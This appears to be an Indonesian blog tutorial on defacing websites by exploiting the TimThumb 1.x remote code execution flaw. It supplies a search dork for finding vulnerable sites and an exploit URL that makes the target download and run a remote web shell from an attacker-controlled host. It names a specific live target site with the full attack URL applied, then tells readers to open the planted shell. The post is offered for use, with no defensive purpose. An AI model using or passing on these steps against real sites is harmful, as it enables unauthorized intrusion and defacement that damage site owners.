Header Ads

Masukan Kode License Disini.
Breaking News
recent

Deface metode timthumb exploit 1.x RCE

Assalamualaikum W.r W.b
wadap yooo bertemu lagi dengan saya
kali ini saya akan memberikan tutorial
mendeface dengan metode timthumb exploit 1.x RCE

BAHAN
1.Internet lah boy yakali kaga pake internet :p
2.Dork : inurl:/timthumb.php site:vn
              atau bisa kalian lihat dork lain nya disini Dork Timthumb
3.Exploit :  ?src=http://flickr.com.tukangpompajakarta.com/shell.php

yups langsung aja ya oke.... :p

- disini saya mempunyai live target : http://eurovie.vn/timthumb.php
*oh ya ciri web yg vuln itu seperti ini,versi yg vuln itu dibawah 1.32 diatasnya ga bisa :p
- jika sudah menemukan yg seperti itu kita langsung saja kita masuka exploit nya di belakang timthumb.php
*seperti ini :
 http://eurovie.vn/timthumb.php?src=http://flickr.com.tukangpompajakarta.com/shell.php
- yaps akan keluar seperti ini.
- jika sudah seperti itu tinggal kita akses si shell nya.
    *cara meng akses shell nya ikuti saja perintah disitu

Mungkin cukup sekian tutorial kali ini
next bakal ada tutorial tutorial lainnya
Oke.... see you on the next tutorial :p


Diberdayakan oleh Blogger.